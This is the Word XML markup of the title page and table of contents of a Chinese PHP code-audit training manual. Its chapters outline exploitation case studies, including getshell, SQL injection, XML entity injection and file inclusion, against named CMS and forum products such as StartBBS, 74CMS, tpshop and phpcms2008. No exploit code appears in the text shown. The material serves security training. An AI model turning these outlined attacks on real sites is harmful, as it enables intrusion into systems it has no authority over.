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EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:right="575"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="48"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="48"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-120"/>
          <w:sz w:val="48"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="48"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代码审计</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="55" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="573"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:color w:val="6FAC46"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>培训教材</w:t>
      </w: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spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体"/>
          <w:b/>
          <w:sz w:val="22"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rPr>
          <w:rFonts w:ascii="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体"/>
          <w:b/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1220" w:bottom="280" w:left="1380" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体"/>
          <w:b/>
          <w:sz w:val="14"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="14"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2D75B5"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="417"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark0" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>代码审计基础</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">........................................................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>- 4 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="315" w:lineRule="exact"/>
        <w:ind w:left="657"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark0" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>代码审计概念</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>.................................................................................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">- </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>4 -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1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>需要了解一些函数</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>.........................................................................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 6 -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2" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>需要了解的超全局变量</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>............</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>.....................................................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">- </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>7 -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3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>审计之初</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>.......................................................................................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 11 -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4" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>如何进行漏洞挖掘</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>...............................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>........................................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 13 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="8"/>
        <w:ind w:left="657"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>一些代码审计工具介绍</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>...............................................................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t xml:space="preserve">- </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>16 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:ind w:left="417"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          </w:rPr>
          <w:t>重装漏洞</w:t>
        </w:r>
        <w:r>
          <w:t>.................................................................</w:t>
        </w:r>
        <w:r>
          <w:t xml:space="preserve">................ </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          </w:rPr>
          <w:t>- 20 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="315" w:lineRule="exact"/>
        <w:ind w:left="657"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>开源轻论坛</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:spacing w:val="-64"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">StartBBS </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>前台</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
            <w:spacing w:val="-64"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>getshell</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">............................................ </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 20 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="10"/>
        <w:ind w:left="417" w:right="317" w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">Simple-Log </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>博客系统全版本重安装漏洞</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 25 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:ind w:left="417"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          </w:rPr>
          <w:t xml:space="preserve">SQL </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          </w:rPr>
          <w:t>注入漏洞</w:t>
        </w:r>
        <w:r>
          <w:t xml:space="preserve">.......................................................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          </w:rPr>
          <w:t>- 30 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="315" w:lineRule="exact"/>
        <w:ind w:left="657"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark9" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>WiiNews(</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">Mobile </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>新</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>闻</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>系</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>统</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>.........................................................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 31 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="230" w:lineRule="auto"/>
        <w:ind w:left="657" w:right="424"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark10" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>tpshop</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:spacing w:val="-10"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>注入</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>..................................................................................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:spacing w:val="-29"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:spacing w:val="-15"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:spacing w:val="-13"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="_bookmark11" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Angsana New" w:eastAsia="Angsana New"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">74CMS </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>人才系统注入全版本通杀进后台</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">.................................... </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 37 -</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="_bookmark12" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Angsana New" w:eastAsia="Angsana New"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">iSiteCMS </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>几处注射漏</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>洞</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>.........................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>..........................................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 43</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
            <w:spacing w:val="-25"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="311" w:lineRule="exact"/>
        <w:ind w:left="657"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark13" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">PHPYun XML </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>实体注入</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve">................................................................ </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 48 -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14" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>cmseasy</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>无限制</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>报错</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>注入</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>...........................................................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 63 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="342" w:lineRule="exact"/>
        <w:ind w:left="417"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark15" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          </w:rPr>
          <w:t>文件包含</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:position w:val="1"/>
          </w:rPr>
          <w:t xml:space="preserve">................................................................................. </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          </w:rPr>
          <w:t>- 67 -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="314" w:lineRule="exact"/>
        <w:ind w:left="657"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark16" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>phpcms2008</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>本地文件包括及利用</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>...............</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:b/>
          </w:rPr>
          <w:t>..............................</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>- 69 -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17" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t>simple-log</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
            <w:b/>
          </w:rPr>
          <w:t>后台任意文件</w:t>
        </w:r>
        <w:r>
